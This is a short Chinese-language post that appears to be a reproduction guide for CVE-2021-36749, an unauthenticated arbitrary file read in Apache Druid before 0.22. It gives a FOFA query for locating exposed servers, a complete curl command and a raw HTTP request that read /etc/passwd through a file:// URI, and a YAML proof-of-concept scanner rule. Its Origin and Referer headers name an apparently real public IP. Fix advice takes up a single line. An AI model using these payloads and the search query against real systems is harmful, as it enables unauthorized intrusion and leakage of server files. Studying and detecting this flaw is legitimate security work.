###Apache Druid LoadData 任意文件读取漏洞-(CVE-2021-36749) –那个少年
0x01 漏洞描述
由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证,攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。
0x02 漏洞影响范围
Apache Druid Version < 0.22
0x03 fofa语法
title="Apache Druid"
0x04漏洞复现
在主界面选择Loaddata
然后选择https –>Connectdata(利用file://协议进行读取)
在“URIs“输入file:///etc/passwd
命令行方式:
curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
burp:
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: xxxx:8095
Content-Length: 423
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://35.198.232.100:8095
Referer: http://35.198.232.100:8095/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
0x05检测poc规则编写
params: []
name: CVE-2021-36749——Apache Druid LoadData 任意文件读取漏洞
set: {}
rules:
- method: POST
path: /druid/indexer/v1/sampler?for=connect
headers:
Connection: close
Content-Type: application/json;charset=UTF-8
body: '{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}'
search: ""
followredirects: false
expression: response.status == 200
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
0x06漏洞修复
升级版本,设置访问权限
请登录后查看回复内容